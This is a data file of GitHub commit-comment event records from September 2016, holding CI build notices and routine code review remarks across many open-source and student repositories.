{"id":"4637367192","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19224094,"position":null,"line":null,"path":null,"commit_id":"44bab343c934788c90233a737f9c8507de9007b4","created_at":"2016-09-29T13:52:08Z","updated_at":"2016-09-29T13:52:08Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 150](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1268&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:39"}},"created_at":"2016-09-29T13:52:08Z"}
{"id":"4637367398","type":"CommitCommentEvent","actor":{"login":"kleetus"},"repo":{"name":"bitpay/bitpay-c-keyutils"},"payload":{"comment":{"id":19224095,"position":null,"line":null,"path":null,"commit_id":"9c9da52b50fc754990670383e4d7a5cb749db97b","created_at":"2016-09-29T13:52:10Z","updated_at":"2016-09-29T13:52:10Z","body":"I don't know how https://github.com/bitpay/bitpay-perl-keyutils is affected by #11, but I'll be reviewing any issues that come into that project, thanks. I do see an object file committed into perl module keyutils, if that's what you are referring to, then this code should have nothing to do with that.\r\n"}},"created_at":"2016-09-29T13:52:10Z"}
{"id":"4637367591","type":"CommitCommentEvent","actor":{"login":"Inventaser"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19224096,"position":50,"line":50,"path":"plugins/de.ovgu.featureide.fm.ui/src/de/ovgu/featureide/fm/ui/editors/featuremodel/actions/CollapseAllAction.java","commit_id":"42f862425c36e1c97db42f86d866da996c540022","created_at":"2016-09-29T13:52:11Z","updated_at":"2016-09-29T13:52:11Z","body":"Fehlende Description"}},"created_at":"2016-09-29T13:52:11Z"}
{"id":"4637371789","type":"CommitCommentEvent","actor":{"login":"bogdando"},"repo":{"name":"mattymo/kargo"},"payload":{"comment":{"id":19224104,"position":17,"line":72,"path":"roles/kubernetes/secrets/tasks/gen_certs.yml","commit_id":"da748c7928c3c88f1d079d6007523c8086afd670","created_at":"2016-09-29T13:52:53Z","updated_at":"2016-09-29T13:52:53Z","body":"You have to notify trigger like we did for installer https://github.com/openstack/fuel-ccp-installer/blob/master/utils/kargo/roles/preinstall/handlers/main.yml"}},"created_at":"2016-09-29T13:52:53Z"}
{"id":"4637373904","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19224110,"position":null,"line":null,"path":null,"commit_id":"fb588cc683107fbb0e9dfc0acab1149122486c8c","created_at":"2016-09-29T13:53:12Z","updated_at":"2016-09-29T13:53:12Z","body":"master (evanweaver) - Win64-Windows-7-VisualStudio-12: OK (2412 of 2619 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.1%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T13:53:12Z"}
{"id":"4637374166","type":"CommitCommentEvent","actor":{"login":"Subv"},"repo":{"name":"Subv/PokemonGo"},"payload":{"comment":{"id":19224111,"position":null,"line":null,"path":null,"commit_id":"8933b7dfbcd0eefb3967a18c8bae76b546bc5768","created_at":"2016-09-29T13:53:14Z","updated_at":"2016-09-29T13:53:14Z","body":"Class project, nothing I can do about it"}},"created_at":"2016-09-29T13:53:14Z"}
{"id":"4637374252","type":"CommitCommentEvent","actor":{"login":"netblue30"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":19224112,"position":25,"line":87,"path":"src/firejail/sandbox.c","commit_id":"ae0e5b667d7756f5a4e318c37aefb0a827abbf25","created_at":"2016-09-29T13:53:16Z","updated_at":"2016-09-29T13:53:16Z","body":"I have to take it back, we need to clean after the kill, just in case one of the processes manages to push something on stdin after we cleaned it."}},"created_at":"2016-09-29T13:53:16Z"}
{"id":"4637375276","type":"CommitCommentEvent","actor":{"login":"gambl"},"repo":{"name":"Homebrew/homebrew-boneyard"},"payload":{"comment":{"id":19224114,"position":null,"line":null,"path":null,"commit_id":"f625c12febcae03349c9834a2b014a50bfa6106c","created_at":"2016-09-29T13:53:26Z","updated_at":"2016-09-29T13:53:26Z","body":"Why has jing been moved to the boneyard whilst trang - which is part of the same jing-trang suite and has the same level of maintenance - has been left in the homebrew core? "}},"created_at":"2016-09-29T13:53:26Z"}
{"id":"4637375857","type":"CommitCommentEvent","actor":{"login":"bogdando"},"repo":{"name":"mattymo/kargo"},"payload":{"comment":{"id":19224116,"position":17,"line":72,"path":"roles/kubernetes/secrets/tasks/gen_certs.yml","commit_id":"da748c7928c3c88f1d079d6007523c8086afd670","created_at":"2016-09-29T13:53:32Z","updated_at":"2016-09-29T13:53:32Z","body":"oh, you do it only once, below, right?.. seems ok then"}},"created_at":"2016-09-29T13:53:32Z"}
{"id":"4637376813","type":"CommitCommentEvent","actor":{"login":"Inventaser"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19224118,"position":38,"line":38,"path":"plugins/de.ovgu.featureide.fm.ui/src/de/ovgu/featureide/fm/ui/editors/featuremodel/operations/SetFeaturesToCollapseAllOperation.java","commit_id":"42f862425c36e1c97db42f86d866da996c540022","created_at":"2016-09-29T13:53:41Z","updated_at":"2016-09-29T13:53:41Z","body":"Fehlende Description"}},"created_at":"2016-09-29T13:53:41Z"}
{"id":"4637378507","type":"CommitCommentEvent","actor":{"login":"jschueller"},"repo":{"name":"m-reuter/arpackpp"},"payload":{"comment":{"id":19224123,"position":null,"line":null,"path":null,"commit_id":"eaaebdb4096fda0d52d101e6d8f347d80da3b014","created_at":"2016-09-29T13:53:57Z","updated_at":"2016-09-29T13:53:57Z","body":"There are some more files that needed to be uncompressed and copied to run all examples, this prevented me to register them to ctest (that and the globbing of test names)."}},"created_at":"2016-09-29T13:53:57Z"}
{"id":"4637380722","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19224131,"position":null,"line":null,"path":null,"commit_id":"e7c6fa0913c505d5b2c2ee799bd67c9e33405b6d","created_at":"2016-09-29T13:54:19Z","updated_at":"2016-09-29T13:54:19Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Op_OM7k0RSGz-cYa8rH_3Q"}},"created_at":"2016-09-29T13:54:19Z"}
{"id":"4637382300","type":"CommitCommentEvent","actor":{"login":"aleitner"},"repo":{"name":"bitpay/bitpay-c-keyutils"},"payload":{"comment":{"id":19224134,"position":null,"line":null,"path":null,"commit_id":"9c9da52b50fc754990670383e4d7a5cb749db97b","created_at":"2016-09-29T13:54:33Z","updated_at":"2016-09-29T13:54:33Z","body":"I'm referring to the fact that we wrote this for the perl keyutils. this code is committed inside the perl-keyutils code. But now that it's different you are essentially maintaining two separate C key utils repos"}},"created_at":"2016-09-29T13:54:33Z"}
{"id":"4637384120","type":"CommitCommentEvent","actor":{"login":"tomaskovacik"},"repo":{"name":"tomaskovacik/vwcdavr"},"payload":{"comment":{"id":19224137,"position":7,"line":37,"path":"CDC_emulator/cdc_arduino_ported_k9spud_vwcdpic/cdc_arduino_ported_k9spud_vwcdpic.ino","commit_id":"afc2dd6f940c02162c26a7a353fd470a3a934107","created_at":"2016-09-29T13:54:52Z","updated_at":"2016-09-29T13:54:52Z","body":"fixed thx"}},"created_at":"2016-09-29T13:54:52Z"}
{"id":"4637387048","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/homebrew-boneyard"},"payload":{"comment":{"id":19224142,"position":null,"line":null,"path":null,"commit_id":"f625c12febcae03349c9834a2b014a50bfa6106c","created_at":"2016-09-29T13:55:21Z","updated_at":"2016-09-29T13:55:21Z","body":"@gambl At least someone took the trouble to fix the URL of `trang`."}},"created_at":"2016-09-29T13:55:21Z"}
{"id":"4637388610","type":"CommitCommentEvent","actor":{"login":"ilovezfs"},"repo":{"name":"Homebrew/homebrew-boneyard"},"payload":{"comment":{"id":19224146,"position":null,"line":null,"path":null,"commit_id":"f625c12febcae03349c9834a2b014a50bfa6106c","created_at":"2016-09-29T13:55:36Z","updated_at":"2016-09-29T13:55:36Z","body":"let's :skull: trang too!"}},"created_at":"2016-09-29T13:55:36Z"}
{"id":"4637389307","type":"CommitCommentEvent","actor":{"login":"HM4"},"repo":{"name":"HM4/hello-world"},"payload":{"comment":{"id":19224147,"position":8,"line":7,"path":"README.md","commit_id":"a025fe5e155decc908e5b42fdbb99eae32534fd2","created_at":"2016-09-29T13:55:43Z","updated_at":"2016-09-29T13:55:43Z","body":"don't do this"}},"created_at":"2016-09-29T13:55:43Z"}
{"id":"4637389376","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/homebrew-boneyard"},"payload":{"comment":{"id":19224148,"position":null,"line":null,"path":null,"commit_id":"f625c12febcae03349c9834a2b014a50bfa6106c","created_at":"2016-09-29T13:55:44Z","updated_at":"2016-09-29T13:55:44Z","body":"Feel free."}},"created_at":"2016-09-29T13:55:44Z"}
{"id":"4637389949","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19224150,"position":62,"line":221,"path":"static/js/controllers/contacts-content.js","commit_id":"a19b9b1aa01aae6768d64113dd31ef4b0e161224","created_at":"2016-09-29T13:55:50Z","updated_at":"2016-09-29T13:55:50Z","body":"Is _persons_ the preferred plural of _person_?"}},"created_at":"2016-09-29T13:55:50Z"}
{"id":"4637394766","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19224157,"position":null,"line":null,"path":null,"commit_id":"656ccd5ab272269c6d8844d0f9b33a17b7666ec8","created_at":"2016-09-29T13:56:35Z","updated_at":"2016-09-29T13:56:35Z","body":"os_2_0_develop (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-656ccd5ab272269c6d8844d0f9b33a17b7666ec8-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-656ccd5ab272269c6d8844d0f9b33a17b7666ec8-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T13:56:35Z"}
{"id":"4637395220","type":"CommitCommentEvent","actor":{"login":"Too-Naive"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19224160,"position":null,"line":null,"path":null,"commit_id":"026d52fab9728f311b8edabaf8a4b598d207f5a7","created_at":"2016-09-29T13:56:39Z","updated_at":"2016-09-29T13:56:39Z","body":"还有弹窗广告什么的 我发现其实可以打电话去给ISP靠北 这样的话他们会收敛"}},"created_at":"2016-09-29T13:56:39Z"}
{"id":"4637397352","type":"CommitCommentEvent","actor":{"login":"ilovezfs"},"repo":{"name":"Homebrew/homebrew-boneyard"},"payload":{"comment":{"id":19224165,"position":null,"line":null,"path":null,"commit_id":"f625c12febcae03349c9834a2b014a50bfa6106c","created_at":"2016-09-29T13:57:01Z","updated_at":"2016-09-29T13:57:01Z","body":"https://github.com/Homebrew/homebrew-core/pull/5382"}},"created_at":"2016-09-29T13:57:01Z"}
{"id":"4637398946","type":"CommitCommentEvent","actor":{"login":"aboone"},"repo":{"name":"sheerid/getting-started"},"payload":{"comment":{"id":19224169,"position":37,"line":37,"path":"recipes/recipe-13-High-Assurance-Teacher-Verification.md","commit_id":"7a77788b1387f253e0d3f91ed79a4ba92889179e","created_at":"2016-09-29T13:57:16Z","updated_at":"2016-09-29T13:57:16Z","body":"this is the end of the template settings so we should move the backticks down here"}},"created_at":"2016-09-29T13:57:16Z"}
{"id":"4637399795","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"RodrigoScheuer/crescer-2016-2"},"payload":{"comment":{"id":19224172,"position":27,"line":27,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"0d872a5b23f3d64e8ad172810ec0143a457afb29","created_at":"2016-09-29T13:57:23Z","updated_at":"2016-09-29T13:57:23Z","body":"pode tirar alguns parentêses:\r\n\r\n```Java\r\nreturn  (anoBissexto % 4 == 0 && anoBissexto % 100 != 0) || anoBissexto % 400 == 0;\r\n```"}},"created_at":"2016-09-29T13:57:23Z"}
{"id":"4637400804","type":"CommitCommentEvent","actor":{"login":"aleitner"},"repo":{"name":"bitpay/bitpay-c-keyutils"},"payload":{"comment":{"id":19224175,"position":null,"line":null,"path":null,"commit_id":"9c9da52b50fc754990670383e4d7a5cb749db97b","created_at":"2016-09-29T13:57:33Z","updated_at":"2016-09-29T13:57:33Z","body":"This was written as a gernal purpose key utils that contained all basic requirements for a keyutils (such as pem generation) and that could be imported into libraries using other languages when necessary."}},"created_at":"2016-09-29T13:57:33Z"}
{"id":"4637403208","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/cubbyHole"},"payload":{"comment":{"id":19224181,"position":null,"line":null,"path":null,"commit_id":"b2a5f9e9d1fb551710e104c1a844a9bf22d495d8","created_at":"2016-09-29T13:57:57Z","updated_at":"2016-09-29T13:57:57Z","body":"dfsgdfg"}},"created_at":"2016-09-29T13:57:57Z"}
{"id":"4637403230","type":"CommitCommentEvent","actor":{"login":"aboone"},"repo":{"name":"sheerid/getting-started"},"payload":{"comment":{"id":19224182,"position":56,"line":56,"path":"recipes/recipe-13-High-Assurance-Teacher-Verification.md","commit_id":"7a77788b1387f253e0d3f91ed79a4ba92889179e","created_at":"2016-09-29T13:57:58Z","updated_at":"2016-09-29T13:57:58Z","body":"In all of these example responses, we should remove the square brackets `[`, this response is not wrapped in an array"}},"created_at":"2016-09-29T13:57:58Z"}
{"id":"4637407437","type":"CommitCommentEvent","actor":{"login":"kc1116"},"repo":{"name":"kc1116/json-gold"},"payload":{"comment":{"id":19224189,"position":null,"line":null,"path":null,"commit_id":"7714d7ce2de0b5d6f24c5bc128a1cddbf45da36d","created_at":"2016-09-29T13:58:37Z","updated_at":"2016-09-29T13:58:37Z","body":"@karenza"}},"created_at":"2016-09-29T13:58:37Z"}
{"id":"4637407846","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19224191,"position":null,"line":null,"path":null,"commit_id":"5cc4f1aaab6b833ca14c0d5c3eb759ee29242887","created_at":"2016-09-29T13:58:41Z","updated_at":"2016-09-29T13:58:41Z","body":"Fazer mais alguns casos de teste com anos acima de 400 (ex: 1900, 2000, 2100, 2016)"}},"created_at":"2016-09-29T13:58:41Z"}
{"id":"4637408247","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19224192,"position":68,"line":227,"path":"static/js/controllers/contacts-content.js","commit_id":"a19b9b1aa01aae6768d64113dd31ef4b0e161224","created_at":"2016-09-29T13:58:45Z","updated_at":"2016-09-29T13:58:45Z","body":"Should there be a `return` after this?  Otherwise we are sorting `children.persons`, and then immediate overwriting it with the result of `childrenWithContactPersonOnTop()`.  Perhaps these functions should all _either_ modify in-place, _or_ return a new value to be assigned to `children.persons`."}},"created_at":"2016-09-29T13:58:45Z"}
{"id":"4637408412","type":"CommitCommentEvent","actor":{"login":"aboone"},"repo":{"name":"sheerid/getting-started"},"payload":{"comment":{"id":19224194,"position":52,"line":52,"path":"recipes/recipe-13-High-Assurance-Teacher-Verification.md","commit_id":"7a77788b1387f253e0d3f91ed79a4ba92889179e","created_at":"2016-09-29T13:58:47Z","updated_at":"2016-09-29T13:58:47Z","body":"Let's leave this as `services.sheerid.com` since this recipe is only currently supported via production environment."}},"created_at":"2016-09-29T13:58:47Z"}
{"id":"4637408940","type":"CommitCommentEvent","actor":{"login":"Too-Naive"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19224196,"position":null,"line":null,"path":null,"commit_id":"a3548e8959ba02bc66e4aa81e4708da7b425f4aa","created_at":"2016-09-29T13:58:52Z","updated_at":"2016-09-29T13:58:52Z","body":"![image](https://cloud.githubusercontent.com/assets/16496671/18956952/deca2b82-868f-11e6-8308-ccbafbb619b2.png)\r\n"}},"created_at":"2016-09-29T13:58:52Z"}
{"id":"4637409009","type":"CommitCommentEvent","actor":{"login":"hyanying"},"repo":{"name":"TechLadies/mutts-rescue"},"payload":{"comment":{"id":19224197,"position":10,"line":10,"path":"app/views/home/home.html.erb","commit_id":"7597e46de76f145a177717af5b2eada7c4716386","created_at":"2016-09-29T13:58:53Z","updated_at":"2016-09-29T13:58:53Z","body":"Line 10-45: CSS styles should be placed in app/assets/stylesheets/application.css"}},"created_at":"2016-09-29T13:58:53Z"}
{"id":"4637409761","type":"CommitCommentEvent","actor":{"login":"the-Arioch"},"repo":{"name":"dheijl/Delphi-XmlLite"},"payload":{"comment":{"id":19224198,"position":null,"line":null,"path":null,"commit_id":"00ebc43d5f27ccf643b9f09a1220997216ac27a2","created_at":"2016-09-29T13:59:01Z","updated_at":"2016-09-29T13:59:01Z","body":"I fixed it in my fork, maybe there to be more refactoring to follow, at least i'll remake the exception and CheckHR to be human-readable :-)"}},"created_at":"2016-09-29T13:59:01Z"}
{"id":"4637410345","type":"CommitCommentEvent","actor":{"login":"dhaligas"},"repo":{"name":"xamarin/GoogleApisForiOSComponents"},"payload":{"comment":{"id":19224199,"position":null,"line":null,"path":null,"commit_id":"4110d5570c36b1637ff2b0aba1653175ae828d8d","created_at":"2016-09-29T13:59:06Z","updated_at":"2016-09-29T13:59:06Z","body":"@SotoiGhost can you separate these into maps and google places?  2 diff nugets .. we don't use the google places only the maps so having them separate will reduce our app size"}},"created_at":"2016-09-29T13:59:06Z"}
{"id":"4637410582","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19224200,"position":null,"line":null,"path":null,"commit_id":"656ccd5ab272269c6d8844d0f9b33a17b7666ec8","created_at":"2016-09-29T13:59:08Z","updated_at":"2016-09-29T13:59:08Z","body":"os_2_0_develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-656ccd5ab272269c6d8844d0f9b33a17b7666ec8-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-656ccd5ab272269c6d8844d0f9b33a17b7666ec8-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T13:59:08Z"}
{"id":"4637412643","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19224203,"position":null,"line":null,"path":null,"commit_id":"a156dc097468fbf6577abd445dfa7fd206a0530d","created_at":"2016-09-29T13:59:29Z","updated_at":"2016-09-29T13:59:29Z","body":"TeamCity Units.NET :: Build and Test [Build 162](http://teamcity.chump.work/viewLog.html?buildId=714&buildTypeId=UnitsNet_BuildTest) is now running\n"}},"created_at":"2016-09-29T13:59:29Z"}
{"id":"4637414333","type":"CommitCommentEvent","actor":{"login":"mattymo"},"repo":{"name":"mattymo/kargo"},"payload":{"comment":{"id":19224206,"position":3,"line":3,"path":"roles/kubernetes/node/templates/traefik.toml.j2","commit_id":"da748c7928c3c88f1d079d6007523c8086afd670","created_at":"2016-09-29T13:59:45Z","updated_at":"2016-09-29T13:59:45Z","body":"fixed"}},"created_at":"2016-09-29T13:59:45Z"}
{"id":"4637415839","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19224208,"position":46,"line":43,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"97ba35fc2dd260c7adefe91c8e10e8d947a03c61","created_at":"2016-09-29T13:59:59Z","updated_at":"2016-09-29T13:59:59Z","body":"Curiosidade.. pq esse `this.nome != null` ?"}},"created_at":"2016-09-29T13:59:59Z"}
{"id":"4637416213","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19224209,"position":null,"line":null,"path":null,"commit_id":"a156dc097468fbf6577abd445dfa7fd206a0530d","created_at":"2016-09-29T14:00:02Z","updated_at":"2016-09-29T14:00:02Z","body":"TeamCity Units.NET :: Build and Test [Build 162](http://teamcity.chump.work/viewLog.html?buildId=714&buildTypeId=UnitsNet_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 820 Build time: 0:0:34"}},"created_at":"2016-09-29T14:00:02Z"}
{"id":"4637418883","type":"CommitCommentEvent","actor":{"login":"kc1116"},"repo":{"name":"kc1116/json-gold"},"payload":{"comment":{"id":19224213,"position":null,"line":null,"path":null,"commit_id":"7714d7ce2de0b5d6f24c5bc128a1cddbf45da36d","created_at":"2016-09-29T14:00:25Z","updated_at":"2016-09-29T14:00:25Z","body":"@kazarena, this is my implementation for signing a document with  LinkedDataSignature. How does it look so far ? I know there can be some refactoring done but once complete along with verifying LinkedDataSignature2015 would this be something you would merge into the master branch? "}},"created_at":"2016-09-29T14:00:25Z"}
{"id":"4637419186","type":"CommitCommentEvent","actor":{"login":"henriquementz"},"repo":{"name":"henriquementz/crescer-2016-2"},"payload":{"comment":{"id":19224216,"position":19,"line":20,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"bb83ce5fa1e1448fba18ba814b249e8c5cc48ede","created_at":"2016-09-29T14:00:27Z","updated_at":"2016-09-29T14:00:27Z","body":"Corrigido! "}},"created_at":"2016-09-29T14:00:27Z"}
{"id":"4637419830","type":"CommitCommentEvent","actor":{"login":"hyanying"},"repo":{"name":"TechLadies/mutts-rescue"},"payload":{"comment":{"id":19224220,"position":203,"line":203,"path":"app/views/home/home.html.erb","commit_id":"7597e46de76f145a177717af5b2eada7c4716386","created_at":"2016-09-29T14:00:34Z","updated_at":"2016-09-29T14:00:34Z","body":"Line 203-215: CSS styles should be placed in app/assets/stylesheets/application.css"}},"created_at":"2016-09-29T14:00:34Z"}
{"id":"4637420346","type":"CommitCommentEvent","actor":{"login":"henriquementz"},"repo":{"name":"henriquementz/crescer-2016-2"},"payload":{"comment":{"id":19224222,"position":20,"line":21,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"bb83ce5fa1e1448fba18ba814b249e8c5cc48ede","created_at":"2016-09-29T14:00:38Z","updated_at":"2016-09-29T14:00:38Z","body":"Corrigido!"}},"created_at":"2016-09-29T14:00:38Z"}
{"id":"4637420551","type":"CommitCommentEvent","actor":{"login":"kc1116"},"repo":{"name":"kc1116/json-gold"},"payload":{"comment":{"id":19224223,"position":null,"line":null,"path":null,"commit_id":"7714d7ce2de0b5d6f24c5bc128a1cddbf45da36d","created_at":"2016-09-29T14:00:40Z","updated_at":"2016-09-29T14:00:40Z","body":"@kazarena my example is in examples/signature.go"}},"created_at":"2016-09-29T14:00:40Z"}
{"id":"4637422490","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19224228,"position":25,"line":23,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"97ba35fc2dd260c7adefe91c8e10e8d947a03c61","created_at":"2016-09-29T14:00:59Z","updated_at":"2016-09-29T14:00:59Z","body":"precisaria do `else` ?"}},"created_at":"2016-09-29T14:00:59Z"}
{"id":"4637425247","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"foretagsplatsen/emacs-js"},"payload":{"comment":{"id":19224235,"position":null,"line":null,"path":null,"commit_id":"68f57c86ba9a212049b13f7582efde1c7ecb2ffe","created_at":"2016-09-29T14:01:25Z","updated_at":"2016-09-29T14:01:25Z","body":"This feature is still being required in `emacs-js-setup`. Did you forget to remove that?"}},"created_at":"2016-09-29T14:01:25Z"}
{"id":"4637425744","type":"CommitCommentEvent","actor":{"login":"Inventaser"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19224237,"position":10,"line":53,"path":"tests/de.ovgu.featureide.fm.core-test/src/de/ovgu/featureide/fm/core/io/xml/TXMLFeatureModelReaderWriter.java","commit_id":"3f4ff044912195bc75e9662278723a3881f5ff6d","created_at":"2016-09-29T14:01:29Z","updated_at":"2016-09-29T14:01:29Z","body":"Sehr lange Zeile."}},"created_at":"2016-09-29T14:01:29Z"}
{"id":"4637432159","type":"CommitCommentEvent","actor":{"login":"tanveeriali"},"repo":{"name":"DNAinfoData/Chicago"},"payload":{"comment":{"id":19224243,"position":null,"line":null,"path":null,"commit_id":"2993b9fda706203402b5f0021ce2e942111c9cd1","created_at":"2016-09-29T14:02:29Z","updated_at":"2016-09-29T14:02:29Z","body":"This data was used in the following stories:\r\n\r\nhttps://www.dnainfo.com/chicago/20160420/lincoln-park/worst-10-places-leave-your-bike-chicago-map\r\n\r\nhttps://www.dnainfo.com/chicago/20160420/uptown/15000-bikes-stolen-chicago-since-2010-barely-any-have-been-found"}},"created_at":"2016-09-29T14:02:29Z"}
{"id":"4637432817","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19224245,"position":null,"line":null,"path":null,"commit_id":"7e9b228122a4f79f4fbb773b8aaaf43ade742010","created_at":"2016-09-29T14:02:36Z","updated_at":"2016-09-29T14:02:36Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1194](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14548&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T14:02:36Z"}
{"id":"4637434810","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19224249,"position":null,"line":null,"path":null,"commit_id":"3a9acebe5c525978872eb22aa1f37245a1d428d3","created_at":"2016-09-29T14:02:55Z","updated_at":"2016-09-29T14:02:55Z","body":"When shnoulle is not complaining that we're not using semantic HTML, he's complaining that we're using semantic HTML  ;-) "}},"created_at":"2016-09-29T14:02:55Z"}
{"id":"4637437272","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"rafasilva192/crescer-2016-2"},"payload":{"comment":{"id":19224256,"position":5,"line":28,"path":"Bluej projeto Modulo 1/DataTerceiraEra.java","commit_id":"f3ae5fd71e5f0344f826d159782decd8ad607bc5","created_at":"2016-09-29T14:03:18Z","updated_at":"2016-09-29T14:03:18Z","body":"testBissext não é um bom nome."}},"created_at":"2016-09-29T14:03:18Z"}
{"id":"4637438737","type":"CommitCommentEvent","actor":{"login":"Inventaser"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19224259,"position":23,"line":63,"path":"tests/de.ovgu.featureide.fm.core-test/src/de/ovgu/featureide/fm/core/io/xml/TXMLFeatureModelReaderWriter.java","commit_id":"3f4ff044912195bc75e9662278723a3881f5ff6d","created_at":"2016-09-29T14:03:33Z","updated_at":"2016-09-29T14:03:33Z","body":"Sehr lange Zeile"}},"created_at":"2016-09-29T14:03:33Z"}
{"id":"4637439224","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"rafasilva192/crescer-2016-2"},"payload":{"comment":{"id":19224261,"position":5,"line":28,"path":"Bluej projeto Modulo 1/DataTerceiraEra.java","commit_id":"f3ae5fd71e5f0344f826d159782decd8ad607bc5","created_at":"2016-09-29T14:03:37Z","updated_at":"2016-09-29T14:03:37Z","body":"A declaração desta variável é inútil neste caso, concorda?"}},"created_at":"2016-09-29T14:03:37Z"}
{"id":"4637449194","type":"CommitCommentEvent","actor":{"login":"vvo"},"repo":{"name":"algolia/autocomplete.js"},"payload":{"comment":{"id":19224279,"position":null,"line":null,"path":null,"commit_id":"47c1731c27bbd78bce4f35cd66ab35ccdb43f0bf","created_at":"2016-09-29T14:05:14Z","updated_at":"2016-09-29T14:05:14Z","body":"Ok this mess up things badly when using with docsearch:\r\n\r\n```js\r\nimport autocomplete from 'autocomplete.js';\r\n// This will require('./zepto.js'), but since there was no Zepto before, it will remove it from window\r\nimport docsearch from 'docsearch.js';\r\n// This will try to load 'autocomplete.js/zepto.js', since it was already required, nothing is done\r\n// now docsearch cannot access zepto variable (this is why docsearch is broken on places, a page with both autocomplete.js and docsearch)\r\n```\r\n\r\ncc @redox "}},"created_at":"2016-09-29T14:05:14Z"}
{"id":"4637449309","type":"CommitCommentEvent","actor":{"login":"naufalizee"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19224280,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-29T14:05:15Z","updated_at":"2016-09-29T14:05:15Z","body":"oh isee thankyou"}},"created_at":"2016-09-29T14:05:15Z"}
